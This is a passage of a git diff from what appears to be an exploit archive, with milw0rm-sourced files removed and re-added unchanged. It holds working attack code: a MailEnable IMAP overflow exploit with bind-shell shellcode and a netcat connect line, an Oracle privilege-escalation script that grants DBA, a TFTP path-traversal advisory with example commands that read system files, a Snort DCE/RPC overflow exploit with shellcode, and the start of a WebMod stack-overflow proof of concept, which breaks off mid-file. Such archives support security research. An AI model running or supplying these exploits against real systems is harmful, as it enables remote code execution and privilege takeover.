+  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
+  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
+  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
+  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
+  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
+  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
+  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
+  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
+  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
+  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
+  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
+  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
+  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
+  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
+  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
+  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
+  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
+  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
+  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
+  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
+  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
+
+# ff e4 -> jmp %esp
+my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
+                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
+                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
+                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
+                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
+                "\xef\xbe\xad\xde"  # DoS
+              );
+
+&print_header;
+
+my $target;
+my $offset;
+
+if (defined($arg{'t'})) { $target = $arg{'t'} }
+if (defined($arg{'n'})) { $offset = $arg{'n'} }
+if (!(defined($target))) { &usage; }
+if (!(defined($offset))) { $offset = 0; }
+if ($offset > $#offsets) {
+    print("only ".($#offsets+1)." targets known!!\n");
+    exit(1);
+} else {
+    $offset = $offsets[$offset];
+}
+
+my $imapd_port = 143;
+my $send_delay = 1;
+
+my $NOP = 'A';
+my $START_PAD = 547;
+my $SHELL_PAD = 12;
+
+if (connect_host($target, $imapd_port)) {
+    print("-> * Connected\n");
+    $buf = "A001 LOGIN \{24\}";
+    send(SOCKET, $buf."\r\n", 0);
+    sleep($send_delay);
+
+    print("-> * Sending payload\n");
+
+    send(SOCKET, "AAAAAAAAAAAAAAAAA\{20\}\r\n", 0);
+    sleep($send_delay);
+
+    send(SOCKET, "BBBBBBBBBBBBBBBBBB\r\n", 0);
+    sleep($send_delay);
+
+    $buf = ($NOP x $START_PAD).# padding
+           $offset.            # EIP
+           ($NOP x $SHELL_PAD).
+           $zshell_win32_bind. # hellcode
+           ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind)));
+    send(SOCKET, $buf, 0);
+
+    print("-> * Successfully sent payload!\n");
+    print("-> * nc ".$target." 1337 for shell...\n");
+}
+
+sub print_header {
+    print("MailEnable Pro <=v2.35 remote exploit\n");
+    print("by: \n\n");
+}
+
+sub usage {
+  print(qq(Usage: $0 -t 
+
+     -t     : hostname to test
+     -n          : return addy offset number
+));
+
+    exit(1);
+}
+
+sub connect_host {
+    ($target, $port) = @_;
+    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
+    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
+    $proto  = getprotobyname('tcp')              || die("Error: $!\n");
+
+    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
+    connect(SOCKET, $paddr)                      || die("Error: $!\n");
+    return(1338);
+}
+
+# milw0rm.com [2007-02-16]
diff --git a/platforms/windows/remote/3364.pl b/platforms/windows/remote/3364.pl
index f55d5eefd..86895e88e 100755
--- a/platforms/windows/remote/3364.pl
+++ b/platforms/windows/remote/3364.pl
@@ -1,116 +1,116 @@
-#!/usr/bin/perl
-#
-# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
-#
-# Grant or revoke dba permission to unprivileged user
-# 
-# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
-# 
-#   REF:    http://www.securityfocus.com/archive/1/396133
-#
-#   AUTHOR: Andrea "bunker" Purificato
-#           http://rawlab.mindcreations.com
-#
-#   DATE:   Copyright 2007 - Fri Feb 23 12:44:18 CET 2007
-#
-# Oracle InstantClient (basic + sdk) required for DBD::Oracle
-#
-#
-# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r
-#  [-] Wait...
-#  [-] Revoking DBA from BUNKER...
-#  DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribe.pl line 91.
-#  [-] Done!
-# 
-# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -g
-#  [-] Wait...
-#  [-] Creating evil function...
-#  [-] Go ...(don't worry about errors)!
-#  DBD::Oracle::st execute failed: ORA-31425: subscription does not exist
-#  ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37
-#  ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
-#  BEGIN
-#   SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||BUNKER.own||''');
-#  END;
-#  "] at dbms_cdc_subscribe.pl line 114.
-#  [-] YOU GOT THE POWAH!!
-#
-# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r
-#  [-] Wait...
-#  [-] Revoking DBA from BUNKER...
-#  [-] Done!
-#  
-
-use warnings;
-use strict;
-use DBI;
-use Getopt::Std;
-use vars qw/ %opt /;
-
-sub usage {
-    print <<"USAGE";
-    
-Syntax: $0 -h  -s  -u  -p  -g|-r [-P ]
-
-Options:
-     -h          target server address
-     -s           target sid name
-     -u          user
-     -p        password 
-
-     -g|-r             (g)rant dba to user | (r)evoke dba from user
-    [-P          Oracle port]
-
-USAGE
-    exit 0
-}
-
-my $opt_string = 'h:s:u:p:grP:';
-getopts($opt_string, \%opt) or &usage;
-&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
-&usage if ( !$opt{g} and !$opt{r} );
-my $user = uc $opt{u};
-
-my $dbh = undef;
-if ($opt{P}) {
-    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
-} else {
-    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
-}
-
-my $sqlcmd = "GRANT DBA TO $user";
-print "[-] Wait...\n";
-
-if ($opt{r}) {
-    print "[-] Revoking DBA from $user...\n";
-    $sqlcmd = "REVOKE DBA FROM $user";
-    $dbh->do( $sqlcmd );
-    print "[-] Done!\n";
-    $dbh->disconnect;
-    exit;
-}
-
-print "[-] Creating evil function...\n";
-$dbh->do( qq{
-CREATE OR REPLACE FUNCTION OWN RETURN NUMBER 
- AUTHID CURRENT_USER AS 
- PRAGMA AUTONOMOUS_TRANSACTION; 
-BEGIN
- EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; 
- RETURN(0);
-END;
-} );
- 
-print "[-] Go ...(don't worry about errors)!\n";
-my $sth = $dbh->prepare(qq{
-BEGIN
- SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||$user.own||''');
-END;
-});
-$sth->execute;
-$sth->finish;
-print "[-] YOU GOT THE POWAH!!\n";
-$dbh->disconnect;
-exit;
-
-# milw0rm.com [2007-02-23]
+#!/usr/bin/perl
+#
+# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
+#
+# Grant or revoke dba permission to unprivileged user
+# 
+# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
+# 
+#   REF:    http://www.securityfocus.com/archive/1/396133
+#
+#   AUTHOR: Andrea "bunker" Purificato
+#           http://rawlab.mindcreations.com
+#
+#   DATE:   Copyright 2007 - Fri Feb 23 12:44:18 CET 2007
+#
+# Oracle InstantClient (basic + sdk) required for DBD::Oracle
+#
+#
+# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r
+#  [-] Wait...
+#  [-] Revoking DBA from BUNKER...
+#  DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribe.pl line 91.
+#  [-] Done!
+# 
+# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -g
+#  [-] Wait...
+#  [-] Creating evil function...
+#  [-] Go ...(don't worry about errors)!
+#  DBD::Oracle::st execute failed: ORA-31425: subscription does not exist
+#  ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37
+#  ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
+#  BEGIN
+#   SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||BUNKER.own||''');
+#  END;
+#  "] at dbms_cdc_subscribe.pl line 114.
+#  [-] YOU GOT THE POWAH!!
+#
+# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r
+#  [-] Wait...
+#  [-] Revoking DBA from BUNKER...
+#  [-] Done!
+#  
+
+use warnings;
+use strict;
+use DBI;
+use Getopt::Std;
+use vars qw/ %opt /;
+
+sub usage {
+    print <<"USAGE";
+    
+Syntax: $0 -h  -s  -u  -p  -g|-r [-P ]
+
+Options:
+     -h          target server address
+     -s           target sid name
+     -u          user
+     -p        password 
+
+     -g|-r             (g)rant dba to user | (r)evoke dba from user
+    [-P          Oracle port]
+
+USAGE
+    exit 0
+}
+
+my $opt_string = 'h:s:u:p:grP:';
+getopts($opt_string, \%opt) or &usage;
+&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
+&usage if ( !$opt{g} and !$opt{r} );
+my $user = uc $opt{u};
+
+my $dbh = undef;
+if ($opt{P}) {
+    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
+} else {
+    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
+}
+
+my $sqlcmd = "GRANT DBA TO $user";
+print "[-] Wait...\n";
+
+if ($opt{r}) {
+    print "[-] Revoking DBA from $user...\n";
+    $sqlcmd = "REVOKE DBA FROM $user";
+    $dbh->do( $sqlcmd );
+    print "[-] Done!\n";
+    $dbh->disconnect;
+    exit;
+}
+
+print "[-] Creating evil function...\n";
+$dbh->do( qq{
+CREATE OR REPLACE FUNCTION OWN RETURN NUMBER 
+ AUTHID CURRENT_USER AS 
+ PRAGMA AUTONOMOUS_TRANSACTION; 
+BEGIN
+ EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; 
+ RETURN(0);
+END;
+} );
+ 
+print "[-] Go ...(don't worry about errors)!\n";
+my $sth = $dbh->prepare(qq{
+BEGIN
+ SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||$user.own||''');
+END;
+});
+$sth->execute;
+$sth->finish;
+print "[-] YOU GOT THE POWAH!!\n";
+$dbh->disconnect;
+exit;
+
+# milw0rm.com [2007-02-23]
diff --git a/platforms/windows/remote/3380.txt b/platforms/windows/remote/3380.txt
index 32208b223..714062dad 100755
--- a/platforms/windows/remote/3380.txt
+++ b/platforms/windows/remote/3380.txt
@@ -1,55 +1,55 @@
-Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 
-server can lead to information disclosure and remote code execution 
-
-Risk: High 
-
-DISCUSSION 
-
-Kiwi CatTools TFTP server doesn.t properly verify filename in PUT and 
-GET request which can be used to download/upload any file from/to 
-server. Default setting allows replacing of existing files. Such 
-settings lead to probability to replace an executable files and run code 
-on attacker choice. 
-
-EXAMPLES 
-
-C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt 
-
-Transfer successful: 212 bytes in 1 second, 212 bytes/s 
-
-C:\>type boot.txt 
-
-[boot loader] timeout=30 
-default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 
-
-C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt 
-
-Transfer successful: 212 bytes in 1 second, 212 bytes/s 
-
-C:\>type pttest.txt 
-
-[boot loader] timeout=30 
-default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 
-
-C:\> 
-
-SOLUTION 
-
-Upgrade to CatTools 3.2.9 which is available for download at 
-http://www.kiwisyslog.com/downloads.php 
-
-CREDITS 
-
-Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) 
-
-DISCLOSURE TIMELINE 
-
-Vulnerability discovered: 11/20/2006 
-
-Initial vendor contact: 12/08/2006 
-
-Patch released: 02/13/2007 
-
-Public disclosure: 02/27/2007 
-
-# milw0rm.com [2007-02-27]
+Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 
+server can lead to information disclosure and remote code execution 
+
+Risk: High 
+
+DISCUSSION 
+
+Kiwi CatTools TFTP server doesn.t properly verify filename in PUT and 
+GET request which can be used to download/upload any file from/to 
+server. Default setting allows replacing of existing files. Such 
+settings lead to probability to replace an executable files and run code 
+on attacker choice. 
+
+EXAMPLES 
+
+C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt 
+
+Transfer successful: 212 bytes in 1 second, 212 bytes/s 
+
+C:\>type boot.txt 
+
+[boot loader] timeout=30 
+default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 
+
+C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt 
+
+Transfer successful: 212 bytes in 1 second, 212 bytes/s 
+
+C:\>type pttest.txt 
+
+[boot loader] timeout=30 
+default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 
+
+C:\> 
+
+SOLUTION 
+
+Upgrade to CatTools 3.2.9 which is available for download at 
+http://www.kiwisyslog.com/downloads.php 
+
+CREDITS 
+
+Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) 
+
+DISCLOSURE TIMELINE 
+
+Vulnerability discovered: 11/20/2006 
+
+Initial vendor contact: 12/08/2006 
+
+Patch released: 02/13/2007 
+
+Public disclosure: 02/27/2007 
+
+# milw0rm.com [2007-02-27]
diff --git a/platforms/windows/remote/3391.py b/platforms/windows/remote/3391.py
index dc45fe9c7..b640c374f 100755
--- a/platforms/windows/remote/3391.py
+++ b/platforms/windows/remote/3391.py
@@ -1,86 +1,86 @@
-#!/usr/bin/python
-#
-# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)
-# 
-# Author: Trirat Puttaraksa 
-#
-# http://sf-freedom.blogspot.com
-#
-######################################################
-# For educational purpose only
-#
-# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1
-#
-# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) 
-# to inject the packet, so you have to install Scapy before use it.
-#
-#######################################################
-
-import sys
-from scapy import *
-from struct import pack
-conf.verb = 0
-
-# NetBIOS Session Service
-payload = "\x00\x00\x02\xab"
-
-# SMB Header
-payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
-payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
-payload += "\x00\x08\x30\x00"
-
-# Tree Connect AndX Request
-payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
-payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
-payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
-payload += "\x3f\x3f\x3f\x3f\x3f\x00"
-
-# NT Create AndX Request
-payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
-payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
-payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
-payload += "\x63\x00\x00\x00"
-
-# Write AndX Request #1
-payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
-payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
-
-#payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
-payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
-payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
-payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
-payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
-payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"
-
-# Write AndX Request #2
-payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
-payload += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
-
-# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com)
-payload += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
-
-payload += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
-payload += "\xd1\x80\xf5\x83\xeb\xfc\xe2\xf4\x55\x39\xc4\xf5\xa9\xd1\x0b\xb0"
-payload += "\x95\x5a\xfc\xf0\xd1\xd0\x6f\x7e\xe6\xc9\x0b\xaa\x89\xd0\x6b\xbc"
-payload += "\x22\xe5\x0b\xf4\x47\xe0\x40\x6c\x05\x55\x40\x81\xae\x10\x4a\xf8"
-payload += "\xa8\x13\x6b\x01\x92\x85\xa4\xf1\xdc\x34\x0b\xaa\x8d\xd0\x6b\x93"
-payload += "\x22\xdd\xcb\x7e\xf6\xcd\x81\x1e\x22\xcd\x0b\xf4\x42\x58\xdc\xd1"
-payload += "\xad\x12\xb1\x35\xcd\x5a\xc0\xc5\x2c\x11\xf8\xf9\x22\x91\x8c\x7e"
-payload += "\xd9\xcd\x2d\x7e\xc1\xd9\x6b\xfc\x22\x51\x30\xf5\xa9\xd1\x0b\x9d"
-payload += "\x95\x8e\xb1\x03\xc9\x87\x09\x0d\x2a\x11\xfb\xa5\xc1\xaf\x58\x17"
-payload += "\xda\xb9\x18\x0b\x23\xdf\xd7\x0a\x4e\xb2\xe1\x99\xca\xff\xe5\x8d"
-payload += "\xcc\xd1\x80\xf5"
-
-payload += "\x90"  # padding
-
-if len(sys.argv) != 2:
-	print "Usage snort_execute_dcerpc.py "
-	sys.exit(1)
-
-target = sys.argv[1]
-
-p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
-send(p)
-
-# milw0rm.com [2007-03-01]
+#!/usr/bin/python
+#
+# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version)
+# 
+# Author: Trirat Puttaraksa 
+#
+# http://sf-freedom.blogspot.com
+#
+######################################################
+# For educational purpose only
+#
+# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1
+#
+# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) 
+# to inject the packet, so you have to install Scapy before use it.
+#
+#######################################################
+
+import sys
+from scapy import *
+from struct import pack
+conf.verb = 0
+
+# NetBIOS Session Service
+payload = "\x00\x00\x02\xab"
+
+# SMB Header
+payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
+payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
+payload += "\x00\x08\x30\x00"
+
+# Tree Connect AndX Request
+payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
+payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
+payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
+payload += "\x3f\x3f\x3f\x3f\x3f\x00"
+
+# NT Create AndX Request
+payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
+payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
+payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
+payload += "\x63\x00\x00\x00"
+
+# Write AndX Request #1
+payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
+payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
+
+#payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
+payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
+payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
+payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
+payload += "\x2b\x10\x48\x60\x02\x00\x00\x00"
+
+# Write AndX Request #2
+payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
+payload += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
+
+# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com)
+payload += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
+
+payload += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
+payload += "\xd1\x80\xf5\x83\xeb\xfc\xe2\xf4\x55\x39\xc4\xf5\xa9\xd1\x0b\xb0"
+payload += "\x95\x5a\xfc\xf0\xd1\xd0\x6f\x7e\xe6\xc9\x0b\xaa\x89\xd0\x6b\xbc"
+payload += "\x22\xe5\x0b\xf4\x47\xe0\x40\x6c\x05\x55\x40\x81\xae\x10\x4a\xf8"
+payload += "\xa8\x13\x6b\x01\x92\x85\xa4\xf1\xdc\x34\x0b\xaa\x8d\xd0\x6b\x93"
+payload += "\x22\xdd\xcb\x7e\xf6\xcd\x81\x1e\x22\xcd\x0b\xf4\x42\x58\xdc\xd1"
+payload += "\xad\x12\xb1\x35\xcd\x5a\xc0\xc5\x2c\x11\xf8\xf9\x22\x91\x8c\x7e"
+payload += "\xd9\xcd\x2d\x7e\xc1\xd9\x6b\xfc\x22\x51\x30\xf5\xa9\xd1\x0b\x9d"
+payload += "\x95\x8e\xb1\x03\xc9\x87\x09\x0d\x2a\x11\xfb\xa5\xc1\xaf\x58\x17"
+payload += "\xda\xb9\x18\x0b\x23\xdf\xd7\x0a\x4e\xb2\xe1\x99\xca\xff\xe5\x8d"
+payload += "\xcc\xd1\x80\xf5"
+
+payload += "\x90"  # padding
+
+if len(sys.argv) != 2:
+	print "Usage snort_execute_dcerpc.py "
+	sys.exit(1)
+
+target = sys.argv[1]
+
+p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
+send(p)
+
+# milw0rm.com [2007-03-01]
diff --git a/platforms/windows/remote/3395.c b/platforms/windows/remote/3395.c
index 6b217c4bd..24840e411 100755
--- a/platforms/windows/remote/3395.c
+++ b/platforms/windows/remote/3395.c
@@ -1,184 +1,184 @@
-/*
- * WebMod Stack Buffer Overflow
- *
- * by cybermind (Kevin Masterson)
- * cybermind@gmail.com
- *
- * WebMod v0.48 exploit PoC code
- *
- */
-#include 
-#include 
-#include 
-
-#define WIN32_LEAN_AND_MEAN
-#include 
-#include 
-#pragma comment (lib, "ws2_32.lib")
-
-/*
-local variables in connectHandle():
-
-char *input;			4
-char buf[8192+1];		8193
-int i,j;			8
-int connfd;			4
-int myid;			4
-threaddata_t *tdata;		4
-httpquery_t query;		149036
-char tmp[1025];			1025
-int rcv;			4
-char clbuf[11];			11
-
-total:				158293
-actual (due to padding):	158308
-
-
-  breakdown of types:
-	typedef struct s_var {		546
-	  char name[33];		  33
-	  char value[513];		  513
-	} var_s;
-
-
-	typedef struct s_httpquery {	149036
-	  char method[11];		  11
-	  char clientip[16];		  16
-	  char url[257];		  257
-	  char *get;			  4
-	  char *post;			  4
-	  char *cookies;		  4
-	  var_s vars[256];		  139776
-	  char currentmapname[257];	  257
-	  char sendcookies[8192+1];	  8193
-	  char contenttype[257];	  257
-	  char location[257];		  257
-	} httpquery_t;
-*/
-
-//contains data to fill the Content-Length field with
-char spambuf[20000];
-
-//code to inject
-//this particular code only works on Win2K SP4 (v5.0.4.0)
-//and kernel32.dll v5.0.2195.6688
-unsigned char code[] = {
-					// ; push string onto the stack without using 0x00
-	0xB8, 0x59, 0x5A, 0x32, 0x11,	//mov     eax, 11325A59h ; "HI!\0" + 11111111h
-	0x2D, 0x11, 0x11, 0x11, 0x11,	//sub     eax, 11111111h
-	0x50,				//push    eax
-	0x8B, 0xC4,			//mov     eax, esp	 ; eax points to string
-
-	0x33, 0xC9,			//xor     ecx, ecx	 ; zero
-
-					// ; call MessageBox
-	0x51,				//push    ecx		 ; flags (0)
-	0x50,				//push    eax		 ; caption
-	0x50,				//push    eax		 ; text
-	0x51,				//push    ecx		 ; hwnd (0)
-	0xB8, 0x98, 0x80, 0xE3, 0x77,	//mov     eax, 77E38098h ; &MessageBox
-	0xFF, 0xD0,			//call    eax
-
-					// ; call GetCurrentProcessId
-	0xB8, 0xF4, 0xB8, 0x4E, 0x7C,	//mov     eax, 7C4EB8F4h ; &GetCurrentProcessId
-	0xFF, 0xD0,			//call    eax
-
-	0x33, 0xC9,			//xor     ecx, ecx	 ; zero
-
-					// ; call TerminateProcess
-	0x51,				//push    ecx		 ; return code (0)
-	0x50,				//push    eax		 ; process id
-	0xB8, 0xC3, 0x8D, 0x51, 0x7C,   //mov     eax, 7C518DC3h ; &TerminateProcess
-	0xFF, 0xD0			//call    eax
-
-};
-
-//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll
-//set this to 0xFFFFFFFF to just cause a crash
-unsigned int our_eip = 0x67E03C5B;
-
-int main(int argc, char* argv[]) {
-	WSADATA wsadata;
-	int sock = 0;
-	struct hostent* host = NULL;
-	struct sockaddr_in saddr;
-
-	//data to sent initially
-	char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: ";
-
-	//data to send after headers
-	char endbuf[] = "\n\n";
-
-	char* hostname = NULL;
-	short hostport = 27015;
-
-	int i;
-	unsigned int sent = 0;
-
-	//get host/port from command line
-	if (argc < 2) {
-		printf("Usage:\t%s  [port=27015]\n", argv[0]);
-		return 1;
-	}
-	hostname = argv[1];
-	if (argc >= 3) hostport = atoi(argv[2]);
-
-	WSAStartup(MAKEWORD(1,1), &wsadata);
-
-	sock = socket(AF_INET, SOCK_STREAM, 0);
-	if (sock <= 0) {
-		printf("socket() error\n");
-		return 1;
-	}
-
-	host = gethostbyname(hostname);
-	if (!host) {
-		printf("gethostbyname() error\n");
-		return 1;
-	}
-
-	printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0]));
-
-	memset(&saddr, 0, sizeof(struct sockaddr_in));
